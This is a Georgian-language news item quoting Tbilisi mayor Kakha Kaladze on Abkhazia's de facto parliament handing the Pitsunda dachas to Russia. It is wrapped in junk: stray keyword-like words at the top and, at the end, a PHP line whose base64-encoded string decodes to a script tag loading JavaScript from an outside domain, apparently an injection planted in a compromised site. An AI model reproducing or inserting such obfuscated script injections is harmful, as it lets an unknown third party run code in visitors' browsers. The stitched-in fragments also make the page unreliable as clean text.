celsiusi
ავერსი საქკაბელი

თბილისის მერის კახა კალაძის განცხადებით, აფხაზეთის ე.წ. პარლამენტის მიერ ბიჭვინთის აგარაკის რუსეთისთვის გადაცემის შეთანხმების რატიფიცირებასთან დაკავშირებით საქართველოს ყველა მეგობარი ქვეყანა ჩართული იქნება. ამის შესახებ მან ჟურნალისტების მიერ საკითხთან დაკავშირებით დასმული კითხვის საპასუხოდ განაცხადა.

მისი თქმით, ტერიტორიები ჩვენი გონიერებით, განათლებით უნდა დავიბრუნოთ.

„არაერთი განცხადება გავაკეთეთ ამ საკითხთან დაკავშირებით. კიდევ ერთხელ ვიმეორებ, ყველა ჩვენი მეგობარი ქვეყანა, საერთაშორისო თანამეგობრობა ჩართული იქნება აღნიშნულ საკითხში. უდიდესი პრობლემაა, რომ ჩვენი ქვეყნის ტერიტორიის დიდი ნაწილი ოკუპირებულია. ჩვენთვის, საქართველოს ხელისუფლებისთვის დღეს ყველაზე დიდი გამოწვევა არის ის, რომ ჩვენი ქვეყნის ტერიტორიის გარკვეული ნაწილი ოკუპირებულია რუსეთის მიერ. შესაბამისად ჩვენ, ჩვენი პოლიტიკით, უნდა მოვახდინოთ ქვეყნის ეკონომიკური გაძლიერება, განვითარება და გონიერებით, განათლებით დავიბრუნოთ ტერიტორიები“, - განაცხადა კახა კალაძემ.

შეგახსენებთ, რომ ბიჭვინთის აგარაკები აფხაზეთის დე-ფაქტო ხელისუფლებამ რუსეთს 49 წლის ვადით გადასცა.

მომხდარს ასევე გმობს საქართველოს საგარეო საქმეთა სამინისტრო. 

 

244
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");